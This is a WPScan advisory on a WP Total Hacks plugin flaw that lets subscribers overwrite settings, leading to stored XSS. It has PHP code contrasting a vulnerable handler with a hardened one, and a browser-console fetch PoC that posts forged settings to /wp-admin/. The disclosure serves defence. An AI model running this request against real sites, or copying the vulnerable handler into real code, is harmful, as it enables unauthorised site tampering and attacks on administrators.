wpvulndb | Daniel Ruf | WPVDB-ID: 46996537-A874-4B2E-9CD7-7D0832F9704D
History: Oct 10, 2022 - 12:00 a.m.

WP Total Hacks <= 4.7.2 - Subscriber+ Arbitrary Options Update to Stored XSS

2022-10-10 00:00:00
Daniel Ruf
wpscan.com
5
wordpress
total hacks plugin
stored xss

EPSS: 0.001 Low
Percentile: 25.0%

The plugin does not prevent low-privilege users from modifying the plugin’s settings. Because the submitted values are neither sanitised on input nor escaped on output, this could allow users such as subscribers to perform Stored Cross-Site Scripting attacks against other users, such as administrators.
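As an added illustration (not WP Total Hacks' own code), a minimal WordPress settings handler with the checks the description says are missing, beside a hardened version. Field and option names mirror the PoC request; the nonce action 'wpbiz_save_settings' and the function names are assumptions.

```php
<?php
// Illustrative WordPress settings handler written for this advisory; it is not
// WP Total Hacks' own code. Field/option names mirror the PoC request; the
// nonce action 'wpbiz_save_settings' and function names are assumptions.
$wfb_text_fields = array( 'wfb_google_analytics', 'wfb_google', 'wfb_bing' );

// BEFORE (the class of flaw described): any logged-in user who can reach
// /wp-admin/ gets their POSTed values written straight into wp_options.
function wfb_save_settings_vulnerable() {
    global $wfb_text_fields;
    if ( empty( $_POST['tabid'] ) || 'total-hacks-admin' !== $_POST['tabid'] ) {
        return;
    }
    foreach ( $wfb_text_fields as $key ) {
        update_option( $key, $_POST[ $key ] ); // no capability, nonce or sanitisation
    }
}

// AFTER: capability check, nonce tied to the logged-in user, sanitised input.
function wfb_save_settings_hardened() {
    global $wfb_text_fields;
    if ( empty( $_POST['tabid'] ) || 'total-hacks-admin' !== $_POST['tabid'] ) {
        return;
    }
    // Subscribers lack manage_options, so the request is rejected before any write.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'wp-total-hacks' ), 403 );
    }
    // A nonce that was not issued to this user fails here and wp_die() stops the request.
    check_admin_referer( 'wpbiz_save_settings', 'wpbiz-nonce' );
    foreach ( $wfb_text_fields as $key ) {
        $raw = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
        update_option( $key, sanitize_text_field( $raw ) );
    }
}
add_action( 'admin_init', 'wfb_save_settings_hardened' );

// Output side: escape stored values when rendering the form, so a value that
// did reach the database cannot execute in an administrator's browser.
function wfb_render_text_field( $key ) {
    printf(
        '<input type="text" name="%1$s" value="%2$s">',
        esc_attr( $key ),
        esc_attr( get_option( $key, '' ) )
    );
}
// The settings form must emit the matching nonce for legitimate saves:
// wp_nonce_field( 'wpbiz_save_settings', 'wpbiz-nonce' );
```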

PoC

Run the command below in the developer console of the web browser while logged in to the blog as a subscriber user:

```javascript
// Submits the Total Hacks settings form fields as the logged-in user
await fetch("/wp-admin/", {
  "credentials": "include",
  "body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern",
  "method": "POST",
  "mode": "cors"
});
```

CPE Name        Operator  Version
wp-total-hacks  eq        *

